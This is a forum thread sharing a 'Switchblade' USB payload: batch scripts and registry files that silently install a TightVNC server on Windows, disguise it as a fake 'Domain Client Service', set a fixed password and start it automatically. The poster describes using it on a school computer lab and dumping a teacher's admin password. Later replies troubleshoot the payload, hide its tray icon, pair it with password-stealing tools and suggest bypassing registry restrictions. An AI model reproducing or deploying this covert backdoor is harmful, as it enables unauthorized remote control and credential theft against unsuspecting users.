Jump to content

NEW - my TightVNC Switchblade payload


kz26
 Share

Recommended Posts

I found that the VNC entry on the Switchblade wiki was too cumbersome to follow.

I did some research and was able to create a silent install package for the TightVNC server (seewww.tightvnc.com.)

The beauty of this VNC variant is that the server requires only 2 files, an EXE and its DLL.

To create this payload:

1. Go to the TightVNC homepage above.

2. Download the no-install zip package.

3. In your switchbladetools directory, create

the folder "tvnc".

4. Copy "winvnc.exe" and "VNCHooks.dll" to the "tvnc" directory.

5. Create "vnc.cmd" in your tools directory with the following code:

@echo off

REM Silent Install of TightVNC server

REM Install script by kz26



REM Part 1 - Copy server files

xcopy tvncwinvnc.exe %systemroot% /c /y

xcopy tvncVNCHooks.dll %systemroot% /c /y



REM install phony WinVNC service and import reg settings

sc create winvnc binpath= "%systemroot%winvnc.exe -service" type= interact type= own start= auto displayname= "Domain Client Service"

sc description winvnc "Manages communication between a Windows Server Domain Controller and a connected Domain Client. If this service is not started or disabled, domain functions will be inoperable."

regedit.exe /s tvncreg1.reg

regedit.exe /s tvncreg2.reg



REM Start the VNC Service and have fun

net start winvnc

6. Create reg1.reg and reg2.reg in your "tvnc" directory.

Contents of reg1.reg

Windows Registry Editor Version 5.00



[HKEY_CURRENT_USERSoftwareORL]



[HKEY_CURRENT_USERSoftwareORLVNCHooks]



[HKEY_CURRENT_USERSoftwareORLVNCHooksApplication_Prefs]



[HKEY_CURRENT_USERSoftwareORLVNCHooksApplication_Prefswinvnc.exe]

"use_GetUpdateRect"=dword:00000001

"use_Timer"=dword:00000000

"use_KeyPress"=dword:00000001

"use_LButtonUp"=dword:00000001

"use_MButtonUp"=dword:00000001

"use_RButtonUp"=dword:00000001

"use_Deferral"=dword:00000001

Contents of reg2.reg

Windows Registry Editor Version 5.00



[HKEY_LOCAL_MACHINESOFTWAREORL]



[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3]

"ConnectPriority"=dword:00000000

"DebugMode"=dword:00000000

"DebugLevel"=dword:00000002

"LoopbackOnly"=dword:00000000

"EnableHTTPDaemon"=dword:00000000

"EnableURLParams"=dword:00000000

"AllowLoopback"=dword:00000001

"AuthRequired"=dword:00000001



[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]

"QuerySetting"=dword:00000002

"QueryTimeout"=dword:0000001e

"QueryAccept"=dword:00000000

"QueryAllowNoPass"=dword:00000000

"SocketConnect"=dword:00000001

"AutoPortSelect"=dword:00000000

"PortNumber"=dword:00001f90

"HTTPPortNumber"=dword:000016a8

"InputsEnabled"=dword:00000001

"LocalInputsDisabled"=dword:00000000

"IdleTimeout"=dword:00000000

"LockSetting"=dword:00000000

"RemoveWallpaper"=dword:00000001

"Password"=hex:77,96,ba,8c,c2,b3,68,07

"PasswordViewOnly"=hex:77,96,ba,8c,c2,b3,68,07

"PollUnderCursor"=dword:00000000

"PollForeground"=dword:00000001

"PollFullScreen"=dword:00000000

"OnlyPollConsole"=dword:00000001

"OnlyPollOnEvent"=dword:00000000

7. Add the following to your go.cmd file:

start /b .vnc.cmd

------------

This payload will silently install the WinVNC service and disguise it as a "realistic" system service.

To connect: Use any VNC viewer to connect to the target.

Port: 8080

Username: N/A

password: hacked

I believe this payload is much more streamlined. Obviously, it won't do the external IP email send as the wiki version advertises, but this method should be more than adequate for most people.

P.S. I use this to install VNC at my school's WinXP Pro computer lab.

Works great for pissing off unsuspecting people...

[/code]

Link to comment
Share on other sites

Yeah, the students at our school are supposed to have limited accounts. However, i pwdumped a teachers comp when they weren't there to get the local admin password.

Link to comment
Share on other sites

Ok, this antidote is pretty simple - it does everything BUT delete the registry keys, but that shouldn't be a major issue.

@echo off

REM TightVNC Server Antidote



REM Turn off the service

sc stop winvnc



REM Delete the service

sc delete winvnc



REM Delete the server files

del %systemroot%winvnc.exe

del %systemroot%VNCHooks.dll

Link to comment
Share on other sites

  • 8 months later...
Hi, im getting an error when i run my go.cmd file it says that the winvnc.exe and vnchooks.dll file can not be found even though they are in the same folder as the go.cmd file.

need to put the  winvnc.exe and vnchooks.dll files in a folder called "tvnc"

Link to comment
Share on other sites

u sayd u used it @ school however dont u then have a limited account and no acces to regedit ?

thts how it is @ our school anyway ...

Also, sometimes it is possible to get around that by using a 3rd party regedit.

I use RegAlyser.

It's a fun & easy way to re-enable the run button in the start menu, cmd and some other things!

:D

USBHacker

PS: Can someone please put all the required files for this hack, into a zip (or some other archive format) and host it onto some server (mediafire is a good one), and give me the link? Or save it as an attachment on this forum? Thanks in advance, USBHacker

Link to comment
Share on other sites

u sayd u used it @ school however dont u then have a limited account and no acces to regedit ?

thts how it is @ our school anyway ...

Also, sometimes it is possible to get around that by using a 3rd party regedit.

I use RegAlyser.

It's a fun & easy way to re-enable the run button in the start menu, cmd and some other things!

:D

USBHacker

PS: Can someone please put all the required files for this hack, into a zip (or some other archive format) and host it onto some server (mediafire is a good one), and give me the link? Or save it as an attachment on this forum? Thanks in advance, USBHacker

is regalyzer portable? , or do you have a portable version ?
Link to comment
Share on other sites

  • 2 weeks later...

Howdy all,

I always enjoy a new silent VNC server install via the USB switchblade, but I can never get them to work. I downloaded VNCHooks.dll and winvnc.exe (TightVNC Win32 Server) from http://www.tightvnc.com/download (tightvnc-1.3.9_x86.zip) and placed both of these files in my WIPCMDtvnc folder. (WIPCMD is my "payload folder" containing go.cmd and vnc.cmd) My vnc.cmd code looks like this:

@echo off
REM Silent Install of TightVNC server
REM Script by kz26

REM Copy VNC Server Files
xcopy tvncwinvnc.exe %systemroot% /c /y
xcopy tvncVNCHooks.dll %systemroot% /c /y

REM Install fake WinVNC service and import reg settings
sc create winvnc binpath= "%systemroot%winvnc.exe -service" type= interact type= own start= auto displayname= "Domain Client Service"
sc description winvnc "Manages communication between a Windows Server Domain Controller and a connected Domain Client. If this service is not started or disabled, domain functions will be inoperable."
regedit.exe /s tvncreg1.reg
regedit.exe /s tvncreg2.reg

REM Port: 8080
REM Username: N/A
REM Password: hacked
net start winvnc
:End
exit

This are my reg1.reg and reg2.reg code(s):

reg1.reg

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3DisableTrayIcon DWORD "1"]

[HKEY_CURRENT_USERSoftwareORL]

[HKEY_CURRENT_USERSoftwareORLVNCHooks]

[HKEY_CURRENT_USERSoftwareORLVNCHooksApplication_Prefs]

[HKEY_CURRENT_USERSoftwareORLVNCHooksApplication_Prefswinvnc.exe]
"use_GetUpdateRect"=dword:00000001
"use_Timer"=dword:00000000
"use_KeyPress"=dword:00000001
"use_LButtonUp"=dword:00000001
"use_MButtonUp"=dword:00000001
"use_RButtonUp"=dword:00000001
"use_Deferral"=dword:00000001

reg2.reg

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINESOFTWAREORL]

[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3]
"ConnectPriority"=dword:00000000
"DebugMode"=dword:00000000
"DebugLevel"=dword:00000002
"LoopbackOnly"=dword:00000000
"EnableHTTPDaemon"=dword:00000000
"EnableURLParams"=dword:00000000
"AllowLoopback"=dword:00000001
"AuthRequired"=dword:00000001

[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]
"QuerySetting"=dword:00000002
"QueryTimeout"=dword:0000001e
"QueryAccept"=dword:00000000
"QueryAllowNoPass"=dword:00000000
"SocketConnect"=dword:00000001
"AutoPortSelect"=dword:00000000
"PortNumber"=dword:00001f90
"HTTPPortNumber"=dword:000016a8
"InputsEnabled"=dword:00000001
"LocalInputsDisabled"=dword:00000000
"IdleTimeout"=dword:00000000
"LockSetting"=dword:00000000
"RemoveWallpaper"=dword:00000001
"Password"=hex:77,96,ba,8c,c2,b3,68,07
"PasswordViewOnly"=hex:77,96,ba,8c,c2,b3,68,07
"PollUnderCursor"=dword:00000000
"PollForeground"=dword:00000001
"PollFullScreen"=dword:00000000
"OnlyPollConsole"=dword:00000001
"OnlyPollOnEvent"=dword:00000000

and finally, this is my go.cmd code that launches vnc.cmd:

@echo [START Silent WinVNC Server Install] >> Documentslogfiles%computername%.log 2>&1
   start /b .vnc.cmd
@echo [End Silent WinVNC Server Install] >> Documentslogfiles%computername%.log 2>&1
:End
exit

This code is the last script to be autorun by my USB Switchblade; when it executes, the rest of my applications (FirePassword, netpass, iehv, etc) all work fine.

Note: I added [HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3DisableTrayIcon DWORD "1"] to the reg1.reg file due to HALEN666's comment about this registry key disabling the WinVNC server icon from the system tray; but can't the same means be achieved by ResHacking winvnc.exe and replacing the WinVNC icon with a clear icon?

- AndyzBong

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...